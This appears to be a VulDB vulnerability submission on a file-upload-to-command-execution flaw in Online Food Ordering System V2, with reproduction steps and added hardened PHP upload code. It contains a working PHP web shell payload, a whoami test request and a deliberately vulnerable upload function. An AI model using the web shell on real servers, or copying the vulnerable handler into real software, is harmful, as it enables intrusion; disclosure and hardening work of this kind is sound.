Submit #71497: Online Food Ordering System V2 - File Upload to OS Command Injection

Information

Title: Online Food Ordering System V2 - File Upload to OS Command Injection
Description:
# Exploit Title: Online Food Ordering System V2 - File Upload to OS Command Injection
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html
# Version: v2.0
# Tested on: Windows 11, Apache

Description:
The "Menu Form" page of Online Food Ordering System V2 (admin/index.php?page=menu) accepts an arbitrary file in its "Image" upload field and stores it under the web-served assets/img/ directory. Uploading a .php file therefore plants a web shell that Apache executes; because the shell passes a request parameter to system(), the unrestricted upload becomes OS command execution with the privileges of the web server process.

Payload used:
`<?php system($_GET['c']); ?>`

Parameter: Menu Form > Image (the uploaded file contains the payload above)

Steps to reproduce:
1. As an admin user, open http://localhost/fos/admin/index.php?page=menu
2. In the "Image" field of the form, upload a PHP file instead of an image.
3. The file's content is the payload `<?php system($_GET['c']); ?>`; name it 1.php and submit the form.
4. Open the stored file in another tab and append the c parameter with the command to run, e.g. http://localhost/fos/assets/img/1673548800_PHP_exif_system.php?c=whoami. The output of whoami in the response confirms OS command execution.

Note that the application rewrites the stored filename (the example URL in step 4 carries a timestamp prefix and a different base name than 1.php), so the final path must be taken from the application's response or the menu listing rather than assumed; the extension, however, is preserved, which is what makes the file executable.
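As an added illustration (not code from Online Food Ordering System V2, whose upload handler is not shown on this page), the following PHP contrasts the upload pattern that produces this class of bug with a hardened handler. The form field name `img` and the directory `assets/img/` are assumed for the example.

```php
<?php
// Added example, not the project's own code. Assumed: the upload arrives in
// $_FILES['img'] and images are stored under the web-served assets/img/ directory.

// VULNERABLE pattern: the client-supplied name and extension are kept, so
// "1.php" is stored as assets/img/<timestamp>_1.php and Apache executes it.
function save_image_vulnerable(array $file, string $dir): string
{
    $dest = rtrim($dir, '/') . '/' . time() . '_' . basename($file['name']);
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('upload failed');
    }
    return $dest;
}

// HARDENED pattern: decide the type from the file's bytes, allowlist it, and
// let the server choose both the base name and the extension.
function save_image_hardened(array $file, string $dir): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Map of accepted MIME types (detected, not client-supplied) to the
    // extension the server will assign.
    $allowed = [
        'image/png'  => 'png',
        'image/jpeg' => 'jpg',
        'image/gif'  => 'gif',
    ];

    // Detect the type from content; $file['type'] and the filename are attacker-controlled.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('rejected: ' . $mime . ' is not an allowed image type');
    }

    // Require a parseable image so a bare "<?php ..." file cannot slip through
    // on a forged signature alone.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('rejected: file is not a valid image');
    }

    // Server-chosen random name; the extension comes from the detected type,
    // so even a PNG with PHP appended is stored as <random>.png and is never
    // handed to the PHP interpreter.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($dir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('upload failed');
    }
    return $dest;
}

// Usage inside the menu form handler (assumed field name 'img'):
// $stored = save_image_hardened($_FILES['img'], __DIR__ . '/../assets/img');
```

The hardened handler fixes the upload itself; as defense in depth, the upload directory should also be forbidden from executing scripts, since it sits under the web root. With Apache and mod_php that is an `.htaccess` in `assets/img/` containing `php_flag engine off`, or a `<FilesMatch "\.ph(p[0-9]?|tml)$">` block with `Require all denied`, so that a future validation bypass yields a downloadable file rather than a web shell.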
User: DisguisedRoot (UID 33702)
Submission: 12/01/2023 19h58 (3 years ago)
Moderation: 12/01/2023 22h09 (2 hours later)
Status: Accepted
VulDB Entry: 218185 [SourceCodester Online Food Ordering System 2.0 Menu Form index.php?page=menu Image Privilege Escalation]
Points: 17
